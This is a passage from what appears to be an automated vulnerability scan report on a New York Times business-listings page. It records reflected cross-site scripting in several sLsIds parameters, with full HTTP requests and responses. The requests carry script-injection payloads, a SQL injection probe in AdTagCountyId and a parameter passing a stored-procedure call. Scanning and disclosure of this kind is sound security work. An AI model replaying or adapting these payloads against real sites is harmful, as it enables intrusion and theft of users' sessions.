25-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91521
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCDTSTDT=PJOLPOGADOKLJACIEJEKEJFM; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsH" value="125-504736,125-521946,125-517146,125-518850,125-524081,125-527129,125-527511,125-527508,125-528677,125-5334501929f"><script>alert(1)</script>8a0fd96b74786c06">
...[SNIP]...

4.289. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsH parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsH request parameter is copied into the HTML document as plain text between tags. The payload 90fc5<script>alert(1)</script>42d5b19021d was submitted in the sLsIdsH parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-53345090fc5<script>alert(1)</script>42d5b19021d&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:38:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=KDMJLAHAFOJIFFBFKFPFAMMO; path=/
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-53345090fc5<script>alert(1)</script>42d5b19021d&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-
...[SNIP]...

4.290. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsI parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880f4"><script>alert(1)</script>42fc4bd6f92ddef90 was submitted in the sLsIdsI parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179880f4"><script>alert(1)</script>42fc4bd6f92ddef90&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91481
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsI" value="125-540051,125-544122,125-549166,125-546131,125-550891,125-563445,125-560883,125-560309,125-565198,125-565179880f4"><script>alert(1)</script>42fc4bd6f92ddef90">
...[SNIP]...

4.291. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsI parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsI request parameter is copied into the HTML document as plain text between tags. The payload 641a1<script>alert(1)</script>335f7ff68a2 was submitted in the sLsIdsI parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179641a1<script>alert(1)</script>335f7ff68a2&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:39:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179641a1<script>alert(1)</script>335f7ff68a2&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-
...[SNIP]...

4.292. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsJ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsJ request parameter is copied into the HTML document as plain text between tags. The payload 4e2fc<script>alert(1)</script>09f3e48ccb4 was submitted in the sLsIdsJ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-5679414e2fc<script>alert(1)</script>09f3e48ccb4&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:40:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-5679414e2fc<script>alert(1)</script>09f3e48ccb4&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-
...[SNIP]...

4.293. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsJ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsJ request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c9d1"><script>alert(1)</script>c483ed52a0c37160d was submitted in the sLsIdsJ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-5679416c9d1"><script>alert(1)</script>c483ed52a0c37160d&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%